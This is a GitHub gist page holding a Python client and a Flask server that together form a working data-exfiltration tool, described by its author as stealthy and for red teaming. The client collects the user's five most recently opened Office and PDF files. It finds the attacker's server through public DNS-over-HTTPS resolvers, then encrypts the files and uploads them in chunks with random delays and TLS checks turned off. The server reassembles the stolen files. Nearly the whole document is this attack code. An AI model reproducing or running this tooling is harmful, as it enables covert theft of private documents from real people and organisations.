Skip to content

Instantly share code, notes, and snippets.

@ASkyeye
Forked from 0xHossam/client.py
Created March 18, 2025 10:49
Show Gist options
  • Save ASkyeye/5386dbcd24959dcfa0fa98a07c0d66d8 to your computer and use it in GitHub Desktop.
Save ASkyeye/5386dbcd24959dcfa0fa98a07c0d66d8 to your computer and use it in GitHub Desktop.
Data Exfiltration Using DNS over HTTPS (DoH) for HTTPS POST Requests & Sending Data in Chunks
"""
Author : Hossam Ehab
Info : Stealthy Data Exfiltration Using (DoH) - Client Code
Date : May 26, 2024
"""
import os, glob, requests, logging, struct, base64, random, time, httpx
from datetime import datetime
import urllib3
import win32com.client
from colorama import Fore, Style, init
from cryptography.fernet import Fernet
init(autoreset = True)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
key = Fernet.generate_key()
cipher_suite = Fernet(key)
office_extensions = [ '.docx', '.xlsx', '.pptx', '.pdf' ]
CHUNK_SIZE = 1024 * 50 # 50 KB per chunk
DOH_URLS = [
"https://cloudflare-dns.com/dns-query",
"https://dns.google/dns-query",
"https://dns.quad9.net/dns-query",
"https://dns.cloudflare.com/dns-query"
]
def resolve_shortcut(path):
shell = win32com.client.Dispatch( "WScript.Shell" )
shortcut = shell.CreateShortCut( path )
return shortcut.Targetpath
def get_recent_files(directory, number_of_files, extensions):
print( f"{Fore.CYAN}[ * ] Fetching recent files from {directory}" )
shortcut_files = glob.glob( os.path.join( directory, '*.lnk' ) )
shortcut_files.sort( key = lambda x: os.path.getmtime( x ), reverse = True )
recent_files = []
for shortcut in shortcut_files:
resolved_path = resolve_shortcut( shortcut )
if any( resolved_path.lower().endswith( ext ) for ext in extensions ):
recent_files.append( resolved_path )
if len( recent_files ) == number_of_files:
break
print( f"{Fore.GREEN}[ + ] Found recent files: {recent_files}" )
return recent_files
def create_dns_query(domain):
transaction_id = os.urandom( 2 ) # Secure random transaction ID
flags = b'\x01\x00' # Standard query with recursion desired
questions = b'\x00\x01' # One question
answer_rrs = b'\x00\x00' # No answer resource records
authority_rrs = b'\x00\x00' # No authority resource records
additional_rrs = b'\x00\x00' # No additional resource records
query_type = b'\x00\x01' # Type A ( IPv4 address )
query_class = b'\x00\x01' # Class IN ( Internet )
labels = domain.split( '.' )
query_body = b''.join( struct.pack( 'B', len( label ) ) + label.encode() for label in labels )
query_body += b'\x00' # End of domain name
return transaction_id + flags + questions + answer_rrs + authority_rrs + additional_rrs + query_body + query_type + query_class
def doh_query(domain, doh_url):
query = create_dns_query( domain )
headers = {
'Content-Type': 'application/dns-message',
'Accept': 'application/dns-message'
}
dns_query_b64 = base64.urlsafe_b64encode( query ).decode( 'utf-8' ).rstrip( '=' )
full_url = f"{doh_url}?dns={dns_query_b64}"
with httpx.Client( http2 = True, verify = False ) as client:
response = client.get( full_url, headers = headers )
response.raise_for_status()
data = response.content
print( f"{Fore.YELLOW}[ * ] Response Data > {data}" )
return decode_dns_response( data )
def random_delay():
delay = random.uniform( 0.5, 2.0 ) # between 0.5 and 2.0 seconds
time.sleep( delay )
def decode_dns_response(data):
try:
answer_start = 12 + data[12:].index( b'\x00' ) + 5 # Find end of the query section
name_pointer, type, class_, ttl, data_len = struct.unpack( '!HHHLH', data[answer_start:answer_start + 12] )
address = struct.unpack( '!4s', data[answer_start + 12:answer_start + 12 + data_len] )[0]
ip_address = ".".join( map( str, address ) )
print( f"{Fore.MAGENTA}[ * ] Answer section:" )
print( f"{Fore.MAGENTA}\t [ + ] Name pointer: {name_pointer}" )
print( f"{Fore.MAGENTA}\t [ + ] Type: {type}" )
print( f"{Fore.MAGENTA}\t [ + ] Class: {class_}" )
print( f"{Fore.MAGENTA}\t [ + ] TTL: {ttl}" )
print( f"{Fore.MAGENTA}\t [ + ] Data length: {data_len}" )
print( f"{Fore.MAGENTA}\t [ + ] IP Address: {ip_address}" )
return ip_address
except Exception as e:
print( f"{Fore.RED}[ ! ] Failed to decode DNS response: {e}" )
return None
def send_file_in_chunks(file_path, server_ip, cipher_suite):
try:
file_size = os.path.getsize( file_path )
except FileNotFoundError:
print( f"{Fore.RED}[ ! ] File not found: {file_path}" )
return
file_name = os.path.basename( file_path )
server_url = f"https://{server_ip}:5000/upload"
with open( file_path, 'rb' ) as f:
for chunk_number in range( 0, file_size, CHUNK_SIZE ):
chunk_data = f.read( CHUNK_SIZE )
encrypted_chunk = cipher_suite.encrypt( chunk_data )
doh_url = random.choice( DOH_URLS )
files = {
'file': ( file_name, encrypted_chunk ),
'chunk_number': ( None, str( chunk_number ) ),
'total_size': ( None, str( file_size ) ),
'key': ( None, base64.urlsafe_b64encode( cipher_suite._signing_key ).decode( 'utf-8' ) ) # Send the key
}
print( f"{Fore.CYAN}[ * ] Sending chunk {chunk_number // CHUNK_SIZE} of file {file_name}" )
print( f"{Fore.CYAN}[ + ] Chunk size: {len( encrypted_chunk )} bytes, Memory address: {hex( id( encrypted_chunk ) )}" )
print( f"{Fore.CYAN}[ * ] Using DoH provider: {doh_url}\n" )
try:
response = requests.post( server_url, files = files, verify = False )
if response.status_code == 200:
print( f"{Fore.GREEN}[ + ] Successfully uploaded chunk {chunk_number // CHUNK_SIZE} of {file_name}" )
else:
print( f"{Fore.RED}[ ! ] Failed to upload chunk {chunk_number // CHUNK_SIZE} of {file_name}" )
break
except requests.RequestException as e:
print( f"{Fore.RED}[ ! ] Error during upload: {e}" )
random_delay()
if __name__ == "__main__":
recent_files_dir = r"C:\Users\hossam\AppData\Roaming\Microsoft\Windows\Recent"
recent_files = get_recent_files( recent_files_dir, 5, office_extensions ) # extract 5 most recent Office files
domain = "0xhossam-redteaming.com"
server_ip = None
for doh_url in DOH_URLS:
print( f"{Fore.CYAN}[ * ] Querying {domain} using DoH provider: {doh_url}" )
server_ip = doh_query( domain, doh_url )
if server_ip:
break
if server_ip:
print( f"{Fore.GREEN}[ + ] Resolved server IP: {server_ip}" )
for recent_file in recent_files:
send_file_in_chunks( recent_file, server_ip, cipher_suite )
else:
print( f"{Fore.RED}[ ! ] Failed to resolve server IP using DoH providers" )
"""
Author : Hossam Ehab
Info : Stealthy Data Exfiltration Using (DoH) - Server Code
Date : May 26, 2024
"""
from flask import Flask, request, jsonify
import os
from cryptography.fernet import Fernet
import base64
app = Flask( __name__ )
UPLOAD_FOLDER = './uploads'
if not os.path.exists( UPLOAD_FOLDER ):
os.makedirs( UPLOAD_FOLDER )
@app.route( '/upload', methods = [ 'POST' ] )
def upload_file():
file = request.files[ 'file' ]
chunk_number = int( request.form[ 'chunk_number' ] )
total_size = int( request.form[ 'total_size' ] )
key = base64.urlsafe_b64decode( request.form[ 'key' ] )
cipher_suite = Fernet( key )
filename = file.filename
encrypted_chunk = file.read()
chunk_data = cipher_suite.decrypt( encrypted_chunk )
file_path = os.path.join( UPLOAD_FOLDER, filename )
with open( file_path, 'ab' ) as f:
f.write( chunk_data )
if os.path.getsize( file_path ) >= total_size:
print( f"Successfully received and reconstructed file: {filename}" )
return jsonify( { 'status': 'success', 'chunk_number': chunk_number } ), 200
if __name__ == '__main__':
app.run( host = '0.0.0.0', port = 5000, ssl_context = ( 'path/to/your/cert.pem', 'path/to/your/key.pem' ) )
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment